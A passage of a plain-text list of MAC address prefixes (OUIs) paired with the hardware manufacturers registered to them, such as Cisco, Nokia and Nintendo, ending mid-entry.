E8B748 Cisco Systems, Inc BC99BC FonSee Technology Inc. 783F15 EasySYNC Ltd. 18D071 DASAN CO., LTD. 58E476 CENTRON COMMUNICATIONS TECHNOLOGIES FUJIAN CO.,LTD 447E95 Alpha and Omega, Inc 986022 EMW Co., Ltd. B8D49D M Seven System Ltd. 3C672C Sciovid Inc. DC9B1E Intercom, Inc. BC5FF4 ASRock Incorporation E8B4AE Shenzhen C&D Electronics Co.,Ltd 50FAAB L-tek d.o.o. 3891FB Xenox Holding BV A8E018 Nokia Corporation 781DFD Jabil Inc 18AEBB Siemens Convergence Creators GmbH&Co.KG B0BDA1 ZAKLAD ELEKTRONICZNY SIMS 70B265 Hiltron s.r.l. CCC62B Tri-Systems Corporation D8C068 Netgenetech.co.,ltd. 601199 Siama Systems Inc 6C81FE Mitsuba Corporation C027B9 Beijing National Railway Research & Design Instituteof Signal & Communication Co., Ltd. 147411 RIM F8A9DE PUISSANCE PLUS A88CEE MicroMade Galka i Drozdz sp.j. DC2B66 InfoBLOCK S.A. de C.V. B8871E Good Mind Industries Co., Ltd. D4F027 Trust Power Ltd. 0455CA BriView (Xiamen) Corp. 1435B3 Future Designs, Inc. AC932F Nokia Corporation 0054AF Continental Automotive Systems Inc. ACCABA Midokura Co., Ltd. 0C8112 Private 9C95F8 SmartDoor Systems, LLC 7819F7 Juniper Networks 64094C Beijing Superbee Wireless Technology Co.,Ltd 7C7D41 Jinmuyu Electronics Co., Ltd. 4C1480 NOREGON SYSTEMS, INC A4856B Q Electronics Ltd 20D5AB Korea Infocom Co.,Ltd. 0CF3EE EM Microelectronic 64D1A3 Sitecom Europe BV F43E9D Benu Networks, Inc. 04E2F8 AEP Ticketing solutions srl EC9ECD Artesyn Embedded Technologies 8C5105 Shenzhen ireadygo Information Technology CO.,LTD. C8208E Storagedata 5C5EAB Juniper Networks 9C807D SYSCABLE Korea Inc. 28E297 Shanghai InfoTM Microelectronics Co.,Ltd. 34B571 PLDS 3C7437 RIM EC9233 Eddyfi NDT Inc 743889 ANNAX Anzeigesysteme GmbH 44D2CA Anvia TV Oy 386E21 Wasion Group Ltd. 2872F0 ATHENA 1C19DE eyevis GmbH 609E64 Vivonic GmbH BC15A6 Taiwan Jantek Electronics,Ltd. DCDECA Akyllor A0AAFD EraThink Technologies Corp. 6CA906 Telefield Ltd 78223D Affirmed Networks 3C02B1 Creation Technologies LP E441E6 Ottec Technology GmbH BC71C1 XTrillion, Inc. E0E8E8 Olive Telecommunication Pvt. Ltd 6052D0 FACTS Engineering B08991 LGE 30142D Piciorgros GmbH 50AF73 Shenzhen Bitland Information Technology Co., Ltd. 5C9AD8 FUJITSU LIMITED A4C0E1 Nintendo Co., Ltd. 4C3B74 VOGTEC(H.K.) Co., Ltd 684352 Bhuu Limited ECE90B SISTEMA SOLUCOES ELETRONICAS LTDA - EASYTECH A08C9B Xtreme Technologies Corp A83944 Actiontec Electronics, Inc 74E06E Ergophone GmbH 0CF0B4 Globalsat International Technology Ltd 48DF1C Wuhan NEC Fibre Optic Communications industry Co. Ltd D49C8E University of FUKUI F8F014 RackWare Inc. 2826A6 PBR electronics GmbH B428F1 E-Prime Co., Ltd. C01242 Alpha Security Products BC20BA Inspur (Shandong) Electronic Information Co., Ltd 1CFEA7 IDentytech Solutins Ltd. 304EC3 Tianjin Techua Technology Co., Ltd. B4CFDB Shenzhen Jiuzhou Electric Co.,LTD FCD4F2 The Coca Cola Company 5C6A7D KENTKART EGE ELEKTRONIK SAN. VE TIC. LTD. STI. 44599F Criticare Systems, Inc 3C2F3A SFORZATO Corp. 74CE56 Packet Force Technology Limited Company AC2FA8 Humannix Co.,Ltd. 1064E2 ADFweb.com s.r.l. CC34D7 GEWISS S.P.A. F02A61 Waldo Networks, Inc. C8A70A Verizon Business 60DA23 Estech Co.,Ltd 44DCCB SEMINDIA SYSTEMS PVT LTD A0DE05 JSC Irbis-T 0817F4 IBM Corp CCD811 Aiconn Technology Corporation F43814 Shanghai Howell Electronic Co.,Ltd 90610C Fida International (S) Pte Ltd 3C5F01 Synerchip Co., Ltd. ECBBAE Digivoice Tecnologia em Eletronica Ltda 34A183 AWare, Inc 9873C4 Sage Electronic Engineering LLC B40142 GCI Science & Technology Co.,LTD 740ABC LightwaveRF Technology Ltd 10A13B FUJIKURA RUBBER LTD. F4E142 Delta Elektronika BV AC8112 Gemtek Technology Co., Ltd. 686359 Advanced Digital Broadcast SA 28061E NINGBO GLOBAL USEFUL ELECTRIC CO.,LTD 64E8E6 global moisture management system E0D10A Katoudenkikougyousyo co ltd C44B44 Omniprint Inc. 18922C Virtual Instruments A49B13 Digital Check C8EE08 TANGTOP TECHNOLOGY CO.,LTD 7472F2 Chipsip Technology Co., Ltd. 48C8B6 SysTec GmbH 3C6278 SHENZHEN JETNET TECHNOLOGY CO.,LTD. C8D5FE Shenzhen Zowee Technology Co., Ltd 2C3068 Pantech Co.,Ltd 00BD27 Exar Corp. 5C4058 Jefferson Audio Video Systems, Inc. 58D08F IEEE 1904.1 Working Group 6C9CE9 Nimble Storage CC09C8 IMAQLIQ LTD 9C4563 DIMEP Sistemas D43D67 Carma Industries Inc. E0A670 Nokia Corporation 58DB8D Fast Co., Ltd. E446BD C&C TECHNIC TAIWAN CO., LTD. 8CDD8D Wifly-City System Inc. 20A2E7 Lee-Dickens Ltd FCEDB9 Arrayent 44ED57 Longicorn, inc. EC98C1 Beijing Risbo Network Technology Co.,Ltd 38A95F Actifio Inc F4DCDA Zhuhai Jiahe Communication Technology Co., limited E80462 Cisco Systems, Inc DCD0F7 Bentek Systems Ltd. D4A928 GreenWave Reality Inc E06290 Jinan Jovision Science & Technology Co., Ltd. 100E2B NEC CASIO Mobile Communications 70E139 3view Ltd 18422F Alcatel Lucent C46354 U-Raku, Inc. 405FBE RIM 6854F5 enLighted Inc 7CB542 ACES Technology 905446 TES ELECTRONIC SOLUTIONS 544A05 wenglor sensoric gmbh 98E165 Accutome 785712 Mobile Integration Workgroup 380A0A Sky-City Communication and Electronics Limited Company 0CD696 Amimon Ltd F4DC4D Beijing CCD Digital Technology Co., Ltd 4013D9 Global ES AC4FFC SVS-VISTEK GmbH B43741 Consert, Inc. 94857A Evantage Industries Corp 4083DE Zebra Technologies Inc 8897DF Entrypass Corporation Sdn. Bhd. 24AF54 NEXGEN Mediatech Inc. F0F842 KEEBOX, Inc. DC4EDE SHINYEI TECHNOLOGY CO., LTD. E087B1 Nata-Info Ltd. 447C7F Innolight Technology Corporation D496DF SUNGJIN C&T CO.,LTD 5C864A Secret Labs LLC F0AD4E Globalscale Technologies, Inc. 903D5A Shenzhen Wision Technology Holding Limited 7CA29B D.SignT GmbH & Co. KG A04041 SAMWONFA Co.,Ltd. 40406B Icomera 6C22AB Ainsworth Game Technology 3018CF DEOS control systems GmbH 08FAE0 Fohhn Audio AG 58B9E1 Crystalfontz America, Inc. 20D906 Iota, Inc. F45595 HENGBAO Corporation LTD. 1C3A4F AccuSpec Electronics, LLC 9C4E20 Cisco Systems, Inc D87533 Nokia Corporation 9835B8 Assembled Products Corporation 288915 CashGuard Sverige AB 4C5DCD Oy Finnish Electric Vehicle Technologies Ltd 70D57E Scalar Corporation B0E39D CAT SYSTEM CO.,LTD. 7C2E0D Blackmagic Design 180C77 Westinghouse Electric Company, LLC 68CA00 Octopus Systems Limited E0589E Laerdal Medical 0C1DC2 SeAH Networks 5475D0 Cisco Systems, Inc 6089B7 KAEL MÃœHENDÄ°SLÄ°K ELEKTRONÄ°K TÄ°CARET SANAYÄ° LÄ°MÄ°TED ŞİRKETÄ° 30525A NST Co., LTD 2CA780 True Technologies Inc. 7C6F06 Caterpillar Trimble Control Technologies 601283 TSB REAL TIME LOCATION SYSTEMS S.L. 98DCD9 UNITEC Co., Ltd. C0CFA3 Creative Electronics & Software, Inc. 94236E Shenzhen Junlan Electronic Ltd 10E6AE Source Technologies, LLC FCE192 Sichuan Jinwangtong Electronic Science&Technology Co,.Ltd 408A9A TITENG CO., Ltd. F445ED Portable Innovation Technology Ltd. 5CE286 Nortel Networks 8C640B Beyond Devices d.o.o. 949C55 Alta Data Technologies D479C3 Cameronet GmbH & Co. KG 70D5E7 Wellcore Corporation 3CF72A Nokia Corporation 545FA9 Teracom Limited 6C32DE Indieon Technologies Pvt. Ltd. 14A62C S.M. Dezac S.A. 547FEE Cisco Systems, Inc ACEA6A GENIX INFOCOMM CO., LTD. E0BC43 C2 Microsystems, Inc. 2CA835 RIM C41ECE HMI Sources Ltd. A8F470 Fujian Newland Communication Science Technologies Co.,Ltd. 8C736E FUJITSU LIMITED B86491 CK Telecom Ltd 50F003 Open Stack, Inc. DC49C9 CASCO SIGNAL LTD 70D880 Upos System sp. z o.o. A05DC1 TMCT Co., LTD. 583CC6 Omneality Ltd. B0C8AD People Power Company 181714 DAEWOOIS F0EC39 Essec 446C24 Reallin Electronic Co.,Ltd 2046F9 Advanced Network Devices (dba:AND) 487119 SGB GROUP LTD. 04FE7F Cisco Systems, Inc A4B1EE H. ZANDER GmbH & Co. KG 842141 Shenzhen Ginwave Technologies Ltd. A0231B TeleComp R&D Corp. B8A3E0 BenRui Technology Co.,Ltd 3CF52C DSPECIALISTS GmbH EC4476 Cisco Systems, Inc 6C1811 Decatur Electronics F8E968 Egker Kft. A8995C aizo ag 4012E4 Compass-EOS 5403F5 EBN Technology Corp. 04C05B Tigo Energy 8038FD LeapFrog Enterprises, Inc. ACBEB6 Visualedge Technology Co., Ltd. 2C9127 Eintechno Corporation AC583B Human Assembler, Inc. E8E776 Shenzhen Kootion Technology Co., Ltd 681FD8 Siemens Industry, Inc. 4001C6 3COM EUROPE LTD 9C5E73 Calibre UK LTD 5C1437 Thyssenkrupp Aufzugswerke GmbH 9C55B4 I.S.E. S.r.l. 4C63EB Application Solutions (Electronics and Vision) Ltd 702F97 Aava Mobile Oy 10CA81 PRECIA 40A6A4 PassivSystems Ltd 94BA31 Visiontec da Amazônia Ltda. B894D2 Retail Innovation HTT AB B0E97E Advanced Micro Peripherals F0C24C Zhejiang FeiYue Digital Technology Co., Ltd E4751E Getinge Sterilization AB 9C5B96 NMR Corporation 60F13D JABLOCOM s.r.o. 50252B Nethra Imaging Incorporated F8811A OVERKIZ 3863F6 3NOD MULTIMEDIA(SHENZHEN)CO.,LTD 78B81A INTER SALES A/S CC0080 BETTINI SRL 644BC3 Shanghai WOASiS Telecommunications Ltd., Co. 942E63 Finsécur AC8317 Shenzhen Furtunetel Communication Co., Ltd ACD180 Crexendo Business Solutions, Inc. CCCC4E Sun Fountainhead USA. Corp 688540 IGI Mobile, Inc. A09A5A Time Domain 64A837 Juni Korea Co., Ltd 202CB7 Kong Yue Electronics & Information Industry (Xinhui) Ltd. 609F9D CloudSwitch 48343D IEP GmbH D4AAFF MICRO WORLD 74E537 RADSPIN 0026E9 SP Corp 0026EB Advanced Spectrum Technology Co., Ltd. 0026E1 Stanford University, OpenFlow Group 002717 CE Digital(Zhenjiang)Co.,Ltd 002716 Adachi-Syokai Co., Ltd. 0026DC Optical Systems Design 002700 Shenzhen Siglent Technology Co., Ltd. 0026EC Legrand Home Systems, Inc 0026D4 IRCA SpA 002663 Shenzhen Huitaiwei Tech. Ltd, co. 002661 Irumtek Co., Ltd. 00265B Hitron Technologies. Inc 002656 Sansonic Electronics USA 00267D A-Max Technology Macao Commercial Offshore Company Limited 00267C Metz-Werke GmbH & Co KG 002673 RICOH COMPANY,LTD. 00266D MobileAccess Networks 0026C0 EnergyHub 0026C1 ARTRAY CO., LTD. 0026BE Schoonderbeek Elektronica Systemen B.V. 0026B5 ICOMM Tele Ltd 00268C StarLeaf Ltd. 00268B Guangzhou Escene Computer Technology Limited 00266F Coordiwise Technology Corp. 00266E Nissho-denki Co.,LTD. 0026C3 Insightek Corp. 002681 Interspiro AB 002683 Ajoho Enterprise Co., Ltd. 00267F Zenterio AB 002698 Cisco Systems, Inc 00269B SOKRAT Ltd. 0026A1 Megger 002644 Thomson Telecom Belgium 002646 SHENYANG TONGFANG MULTIMEDIA TECHNOLOGY COMPANY LIMITED 00263F LIOS Technology GmbH 00263B Onbnetech 002658 T-Platforms (Cyprus) Limited 00264C Shanghai DigiVision Technology Co., Ltd. 00262F HAMAMATSU TOA ELECTRONICS 002631 COMMTACT LTD 0025FB Tunstall Healthcare A/S 0025F4 KoCo Connector AG 002606 RAUMFELD GmbH 002607 Enabling Technology Pty Ltd 002624 Thomson Inc. 002605 CC Systems AB 002602 SMART Temps LLC 00261A Femtocomm System Technology Corp. 002634 Infineta Systems, Inc 002599 Hedon e.d. B.V. 002597 Kalki Communication Technologies 002592 Guangzhou Shirui Electronic Co., Ltd 002594 Eurodesign BG LTD 00259F TechnoDigital Technologies GmbH 00259D Private 002598 Zhong Shan City Litai Electronic Industrial Co. Ltd 0025E3 Hanshinit Inc. 0025D4 General Dynamics Mission Systems 0025C2 RingBell Co.,Ltd. 0025A7 itron 0025A9 Shanghai Embedway Information Technologies Co.,Ltd 0025CA LS Research, LLC 0025B4 Cisco Systems, Inc 0025B2 MBDA Deutschland GmbH 0025EF I-TEC Co., Ltd. 002528 Daido Signal Co., Ltd. 002526 Genuine Technologies Co., Ltd. 00256B ATENIX E.E. s.r.l. 00256E Van Breda B.V. 002565 Vizimax Inc. 00255E Shanghai Dare Technologies Co.,Ltd. 00253B din Dietmar Nocker Facilitymanagement GmbH 00253D DRS Consolidated Controls 002535 Minimax GmbH & Co KG 002584 Cisco Systems, Inc 002579 J & F Labs 00257F CallTechSolution Co.,Ltd 002577 D-BOX Technologies 002572 Nemo-Q International AB 002529 COMELIT GROUP S.P.A 00252A Chengdu GeeYa Technology Co.,LTD 00258A Pole/Zero Corporation 00255F SenTec AG 0024EC United Information Technology Co.,Ltd. 0024E6 In Motion Technology Inc. 0024E7 Plaster Networks 0024E4 Withings 0024DE GLOBAL Technology Inc. 0024DC Juniper Networks 0024DB Alcohol Monitoring Systems 002521 Logitek Electronic Systems, Inc. 00251F ZYNUS VISION INC. 00251E ROTEL TECHNOLOGIES 002519 Viaas Inc 0024D5 Winward Industrial Limited 0024DD Centrak, Inc. 0024EA iris-GmbH infrared & intelligent sensors 0024ED YT Elec. Co,.Ltd. 002503 IBM Corp 002504 Valiant Communications Limited 002513 CXP DIGITAL BV 0024A4 Siklu Communication 00249A Beijing Zhongchuang Telecommunication Test Co., Ltd. 00249E ADC-Elektronik GmbH 00249F RIM Testing Services 0024C2 Asumo Co.,Ltd. 0024BF CIAT 0024C0 NTI COMODO INC 0024BB CENTRAL Corporation 0024BC HuRob Co.,Ltd 0024AD Adolf Thies Gmbh & Co. KG 0024A7 Advanced Video Communications Inc. 0024AB A7 Engineering, Inc. 002466 Unitron nv 00245F Vine Telecom CO.,Ltd. 002455 MuLogic BV 002488 Centre For Development Of Telematics 00248F DO-MONIX 002479 Optec Displays, Inc. 0024B7 GridPoint, Inc. 0024AE IDEMIA 002468 Sumavision Technologies Co.,Ltd 00243A Ludl Electronic Products 002439 Digital Barriers Advanced Technologies 002434 Lectrosonics, Inc. 00245A Nanjing Panda Electronics Company Limited 00245B RAIDON TECHNOLOGY, INC. 002459 ABB Automation products GmbH 00244E RadChips, Inc. 00240D OnePath Networks LTD. 00240B Virtual Computer Inc. 002402 Op-Tection GmbH 00242F Micron 002426 NOHMI BOSAI LTD. 002418 Nextwave Semiconductor 002412 Benign Technologies Co, Ltd. 002429 MK MASTER INC. 0023DB saxnet gmbh 0023C8 TEAM-R 0023EB Cisco Systems, Inc 0023EC Algorithmix GmbH 0023C1 Securitas Direct AB 0023AA HFR, Inc. 0023A5 SageTV, LLC 00239E Jiangsu Lemote Technology Corporation Limited 0023FC Ultra Stereo Labs, Inc 0023BB Schmitt Industries 00238D Techno Design Co., Ltd. 002387 ThinkFlood, Inc. 002384 GGH Engineering s.r.l. 002391 Maxian 002392 Proteus Industries Inc. 002393 AJINEXTEK 00237F PLANTRONICS, INC. 00236F DAQ System 002330 DIZIPIA, INC. 002369 Cisco-Linksys, LLC 0022F8 PIMA Electronic Systems Ltd. 00231C Fourier Systems Ltd. 00231D Deltacom Electronics Ltd 0022D7 Nintendo Co., Ltd. 0022D6 Cypak AB 0022D0 Polar Electro Oy 00230A ARBURG GmbH & Co KG 0022C3 Zeeport Technology Inc. 002316 KISAN ELECTRONICS CO 00230F Hirsch Electronics Corporation 00232D SandForce 002323 Zylin AS 0022DE OPPO Digital, Inc. 0022F1 Private 0022A2 Xtramus Technologies 00229E Social Aid Research Co., Ltd. 002285 NOMUS COMM SYSTEMS 002281 Daintree Networks Pty 002255 Cisco Systems, Inc 00224E SEEnergy Corp. 002287 Titan Wireless LLC 002288 Sagrad, Inc. 002273 Techway 00226B Cisco-Linksys, LLC 002267 Nortel Networks 002295 SGM Technology for lighting spa 00225A Garde Security AB 002242 Alacron Inc. 002234 Corventis Inc. 0021F7 HPN Supply Chain 0021F4 INRange Systems, Inc 0021F5 Western Engravers Supply, Inc. 002232 Design Design Technology Ltd 00222B Nucomm, Inc. 002226 Avaak, Inc. 002221 ITOH DENKI CO,LTD. 00221D Freegene Technology LTD 002224 Good Will Instrument Co., Ltd. 002245 Leine & Linde AB 002249 HOME MULTIENERGY SL 002240 Universal Telecom S/A 00220F MoCA (Multimedia over Coax Alliance) 00220A OnLive, Inc 002203 Glensound Electronics Ltd 002204 KORATEK 0021FF Cyfrowy Polsat SA 0021E4 I-WIN 0021E5 Display Solution AG 00221B Morega Systems 0021B2 Fiberblaze A/S 0021AC Infrared Integrated Systems Ltd 00218E MEKICS CO., LTD. 00218F Avantgarde Acoustic Lautsprechersysteme GmbH 00217E Telit Communication s.p.a 002187 Imacs GmbH 002181 Si2 Microsystems Limited 0021C2 GL Communications Inc 0021E2 visago Systems & Controls GmbH & Co. KG 0021DD Northstar Systems Corp 0021D5 X2E GmbH 0021A2 EKE-Electronics Ltd. 0021C9 Wavecom Asia Pacific Limited 00214A Pixel Velocity, Inc 002146 Sanmina-SCI 00216E Function ATI (Huizhou) Telecommunications Co., Ltd. 00216D Soltech Co., Ltd. 002165 Presstek Inc. 00211F SHINSUNG DELTATECH CO.,LTD. 002124 Optos Plc 002133 Building B, Inc 002134 Brandywine Communications 00213A Winchester Systems Inc. 00212E dresden-elektronik 002130 Keico Hightech Inc. 00215B SenseAnywhere 00214E GS Yuasa Power Supply Ltd. 002142 Advanced Control Systems doo 001FFA Coretree, Co, Ltd 001FF5 Kongsberg Defence & Aerospace 001FF2 VIA Technologies, Inc. 002101 Aplicaciones Electronicas Quasar (AEQ) 002103 GHI Electronics, LLC 001FF8 Siemens AG, Sector Industry, Drive Technologies, Motion Control Systems 001FD0 GIGA-BYTE TECHNOLOGY CO.,LTD. 001FD1 OPTEX CO.,LTD. 001FC9 Cisco Systems, Inc 001FDC Mobile Safe Track Ltd 001FD6 Shenzhen Allywll 002117 Tellord 00210F Cernium Corp 001FF1 Paradox Hellas S.A. 001FE6 Alphion Corporation 001FCF MSI Technology GmbH 001F9C LEDCO 001F90 Actiontec Electronics, Inc 001F91 DBS Lodging Technologies, LLC 001F98 DAIICHI-DENTSU LTD. 001F93 Xiotech Corporation 001F51 HD Communications Corp 001F53 GEMAC Chemnitz GmbH 001F50 Swissdis AG 001F4C Roseman Engineering Ltd 001FA9 Atlanta DTH, Inc. 001FA3 T&W Electronics(Shenzhen)Co.,Ltd. 001FA2 Datron World Communications, Inc. 001F70 Botik Technologies LTD 001F64 Beijing Autelan Technology Inc. 001F6D Cisco Systems, Inc 001F24 DIGITVIEW TECHNOLOGY CO., LTD. 001F21 Inner Mongolia Yin An Science & Technology Development Co.,L 001F22 Source Photonics, Inc. 001F1D Atlas Material Testing Technology LLC 001F15 Bioscrypt Inc 001F2B Orange Logic 001F2A ACCM 001F30 Travelping 001F48 Mojix Inc. 001F3E RP-Technik e.K. 001EF0 Gigafin Networks 001EF2 Micro Motion Inc 001F37 Genesis I&C 001F2C Starbridge Networks 001F31 Radiocomp 001F12 Juniper Networks 001EEA Sensor Switch, Inc. 001F04 Granch Ltd. 001E94 SUPERCOM TECHNOLOGY CORPORATION 001E8F CANON INC. 001EA5 ROBOTOUS, Inc. 001EA7 Actiontec Electronics, Inc 001EA0 XLN-t 001E98 GreenLine Communications 001E9A HAMILTON Bonaduz AG 001EDF Master Industrialization Center Kista 001EE3 T&W Electronics (ShenZhen) Co.,Ltd 001ED9 Mitsubishi Precision Co.,LTd. 001ED3 Dot Technology Int'l Co., Ltd. 001EA6 Best IT World (India) Pvt. Ltd. 001E83 LAN/MAN Standards Association (LMSC) 001E7C Taiwick Limited 001ECF PHILIPS ELECTRONICS UK LTD 001E22 ARVOO Imaging Products BV 001E1A Best Source Taiwan Inc. 001E19 GTRI 001E14 Cisco Systems, Inc 001E44 SANTEC 001E62 Siemon 001E5C RB GeneralEkonomik 001E5D Holosys d.o.o. 001E78 Owitek Technology Ltd., 001E7A Cisco Systems, Inc 001E27 SBN TECH Co.,Ltd. 001E60 Digital Lighting Systems, Inc 001E6C Opaque Systems 001E2F DiMoto Pty Ltd 001E36 IPTE 001DA7 Seamless Internet 001DA5 WB Electronics 001DA8 Takahata Electronics Co.,Ltd 001DA9 Castles Technology, Co., LTD 001DCB Exéns Development Oy 001DCA PAV Electronics Limited 001DC2 XORTEC OY 001E0E MAXI VIEW HOLDINGS LIMITED 001E0F Briot International 001DE3 Intuicom 001DDE Zhejiang Broadcast&Television Technology Co.,Ltd. 001DE5 Cisco Systems, Inc 001DEC Marusys 001DE8 Nikko Denki Tsushin Corporation(NDTC) 001DDA Mikroelektronika spol. s r. o. 001DB0 FuJian HengTong Information Technology Co.,Ltd 001DB8 Intoto Inc. 001DF5 Sunshine Co,LTD 001DF0 Vidient Systems, Inc. 001DFE Palm, Inc 001D52 Defzone B.V. 001D4A Carestream Health, Inc. 001D96 WatchGuard Video 001D8F PureWave Networks 001D8C La Crosse Technology LTD 001D64 Adam Communications Systems Int Ltd 001D5E COMING MEDIA CORP. 001D55 ZANTAZ, Inc 001DA1 Cisco Systems, Inc 001D71 Cisco Systems, Inc 001D65 Microwave Radio Communications 001D50 SPINETIX SA 001D45 Cisco Systems, Inc 001D69 Knorr-Bremse IT-Services GmbH 001CF8 Parade Technologies, Ltd. 001CF7 AudioScience 001CF6 Cisco Systems, Inc 001CF5 Wiseblue Technology Limited 001CEE SHARP Corporation 001D07 Shenzhen Sang Fei Consumer Communications Co.,Ltd 001D06 HM Electronics, Inc. 001D01 Neptune Digital 001D33 Maverick Systems Inc. 001D2C Wavetrend Technologies (Pty) Limited 001CCF LIMETEK 001D24 Aclara Power-Line Systems Inc. 001D18 Power Innovation GmbH 001D1B Sangean Electronics Inc. 001D17 Digital Sky Corporation 001D27 NAC-INTERCOM 001CE3 Optimedical Systems 001CDE Interactive Multimedia eXchange Inc. 001D36 ELECTRONICS CORPORATION OF INDIA LIMITED 001C80 New Business Division/Rhea-Information CO., LTD. 001C83 New Level Telecom Co., Ltd. 001C76 The Wandsworth Group Ltd 001C72 Mayer & Cie GmbH & Co KG 001CAD Wuhan Telecommunication Devices Co.,Ltd 001CA7 International Quartz Limited 001CAB Meyer Sound Laboratories, Inc. 001C9E Dualtech IT AB 001CC8 INDUSTRONIC Industrie-Electronic GmbH & Co. KG 001CC6 ProStor Systems 001CBE Nintendo Co., Ltd. 001C94 LI-COR Biosciences 001C8C DIAL TECHNOLOGY LTD. 001CCA Shanghai Gaozhi Science & Technology Development Co. 001CC9 Kaise Electronic Technology Co., Ltd. 001C93 ExaDigm Inc 001C85 Eunicorn 001C67 Pumpkin Networks, Inc. 001C60 CSP Frontier Technologies,Inc. 001C6A Weiss Engineering Ltd. 001C0A Shenzhen AEE Technology Co.,Ltd. 001C0D G-Technology, Inc. 001C03 Betty TV Technology AG 001C46 QTUM 001C42 Parallels, Inc. 001C3E ECKey Corporation 001C51 Celeno Communications 001C54 Hillstone Networks Inc 001C59 DEVON IT 001C22 Aeris Elettronica s.r.l. 001C1D CHENZHOU GOSPELL DIGITAL TECHNOLOGY CO.,LTD 001C39 S Netsystems Inc. 001C37 Callpod, Inc. 001C33 Sutron 001BF6 CONWISE Technology Corporation Ltd. 001BF8 Digitrax Inc. 001C2F Pfister GmbH 001C27 Sunell Electronics Co. 001C0F Cisco Systems, Inc 001C48 WiDeFi, Inc. 001BAD iControl Incorporated 001BA7 Lorica Solutions 001BA5 MyungMin Systems, Inc. 001BF1 Nanjing SilverNet Software Co., Ltd. 001BEF Blossoms Digital Technology Co.,Ltd. 001BEB DMP Electronics INC. 001BA2 IDS Imaging Development Systems GmbH 001B9D Novus Security Sp. z o.o. 001BC9 FSN DISPLAY INC 001BC3 Mobisolution Co.,Ltd 001BCE Measurement Devices Ltd 001BB8 BLUEWAY ELECTRONIC CO;LTD 001BB2 Intellect International NV 001BE7 Postek Electronics Co., Ltd. 001BE3 Health Hero Network, Inc. 001BDC Vencer Co., Ltd. 001BD5 Cisco Systems, Inc 001B95 VIDEO SYSTEMS SRL 001B90 Cisco Systems, Inc 001B7F TMN Technologies Telecomunicacoes Ltda 001B7E Beckmann GmbH 001B7A Nintendo Co., Ltd. 001B34 Focus System Inc. 001B3A SIMS Corp. 001B2E Sinkyo Electron Inc 001B5F Alien Technology 001B61 Digital Acoustics, LLC 001B5E BPL Limited 001B5C Azuretec Co., Ltd. 001B72 Sicep s.p.a. 001B74 MiraLink Corporation 001B6D Midtronics, Inc. 001B6F Teletrak Ltd 001B4B SANION Co., Ltd. 001B2D Med-Eng Systems Inc. 001B87 Deepsound Tech. Co., Ltd 001B4D Areca Technology Corporation 001AE3 Cisco Systems, Inc 001ADF Interactivetv Pty Limited 001AE1 EDGE ACCESS INC 001AE8 Unify Software and Solutions GmbH & Co. KG 001AE9 Nintendo Co., Ltd. 001AE5 Mvox Technologies Inc. 001AE4 Medicis Technologies Corporation 001AF8 Copley Controls Corporation 001AF5 PENTAONE. CO., LTD. 001AED INCOTEC GmbH 001AEE Shenztech Ltd 001ACE YUPITERU CORPORATION 001ACC Celestial Semiconductor, Ltd 001AD2 Eletronica Nitron Ltda 001B1D Phoenix International Co., Ltd 001B1A e-trees Japan, Inc. 001B12 Apprion 001AFE SOFACREAL 001AF1 Embedded Artists AB 001B0D Cisco Systems, Inc 001B0A Intelligent Distributed Controls Ltd 001AB1 Asia Pacific Satellite Industries Co., Ltd. 001AB7 Ethos Networks LTD. 001AB2 Cyber Solutions Inc. 001A97 fitivision technology Inc. 001A90 Trópico Sistemas e Telecomunicações da Amazônia LTDA. 001A94 Votronic GmbH 001A86 AdvancedIO Systems Inc 001AC7 UNIPOINT 001AC0 JOYBIEN TECHNOLOGIES CO., LTD. 001A9E ICON Digital International Limited 001A98 Asotel Communication Limited Taiwan Branch 001A72 Mosart Semiconductor Corp. 001A68 Weltec Enterprise Co., Ltd. 001AC2 YEC Co.,Ltd. 001AA5 BRN Phoenix 001AA2 Cisco Systems, Inc 001A9C RightHand Technologies, Inc. 001A7E LN Srithai Comm Ltd. 001A5A Korea Electric Power Data Network(KDN) Co., Ltd 001A5F KitWorks.fi Ltd. 001A35 BARTEC GmbH 001A37 Lear Corporation 001A38 Sanmina-SCI 001A2B Ayecom Technology Co., Ltd. 001A28 ASWT Co., LTD. Taiwan Branch H.K. 001A2C SATEC Co.,LTD 001A27 Ubistar 001A21 Brookhuis Applied Technologies BV 0019FF Finnzymes 0019FA Cable Vision Electronics CO., LTD. 001A5D Mobinnova Corp. 001A4D GIGA-BYTE TECHNOLOGY CO.,LTD. 001A48 Takacom Corporation 001A0B BONA TECHNOLOGY INC. 001A06 OpVista, Inc. 001A2E Ziova Coporation 001A32 ACTIVA MULTIMEDIA 001A00 MATRIX INC. 0019AD BOBST SA 0019A2 ORDYN TECHNOLOGIES 0019A5 RadarFind Corporation 001993 Changshu Switchgear MFG. Co.,Ltd. (Former Changshu Switchgea 0019F1 Star Communication Network Technology Co.,Ltd 0019EC Sagamore Systems, Inc. 0019CC RCG (HK) Ltd 0019C8 AnyDATA Corporation 0019C4 Infocrypt Inc. 0019BC ELECTRO CHANCE SRL 00199B Diversified Technical Systems, Inc. 001990 ELM DATA Co., Ltd. 00198F Nokia Bell N.V. 0019D8 MAXFOR 0019D5 IP Innovations, Inc. 0019A3 asteel electronique atlantique 0019EA TeraMage Technologies Co., Ltd. 00196E Metacom (Pty) Ltd. 001965 YuHua TelTech (ShangHai) Co., Ltd. 001966 Asiarock Technology Limited 00197B Picotest Corp. 001973 Zeugma Systems 001975 Beijing Huisen networks technology Inc 001940 Rackable Systems 00193C HighPoint Technologies Incorporated 00195C Innotech Corporation 00195F Valemount Networks Corporation 001948 AireSpider Networks 001943 Belden 00192E Spectral Instruments, Inc. 00192B Aclara RF Systems Inc. 00191E Beyondwiz Co., Ltd. 001981 Vivox Inc 001945 RF COncepts, LLC 00191F Microlink communications Inc. 001920 KUME electric Co.,Ltd. 001926 BitsGen Co., Ltd. 001929 2M2B Montadora de Maquinas Bahia Brasil LTDA 0018F1 Chunichi Denshi Co.,LTD. 0018F2 Beijing Tianyu Communication Equipment Co., Ltd 0018EC Welding Technology Corporation 0018ED Accutech Ultrasystems Co., Ltd. 00190B Southern Vision Systems, Inc. 001903 Bigfoot Networks Inc 001900 Intelliverese - DBA Voicecom 001902 Cambridge Consultants Ltd 00192A Antiope Associates 00190F Advansus Corp. 001911 Just In Mobile Information Technologies (Shanghai) Co., Ltd. 0018E0 ANAVEO 001917 Posiflex Inc. 001918 Interactive Wear AG 0018CB Tecobest Technology Limited 0018CE Dreamtech Co., Ltd 001894 NPCore, Inc. 001898 KINGSTATE ELECTRONICS CORPORATION 001892 ads-tec GmbH 001891 Zhongshan General K-mate Electronics Co., Ltd 0018AD NIDEC SANKYO CORPORATION 0018AC Shanghai 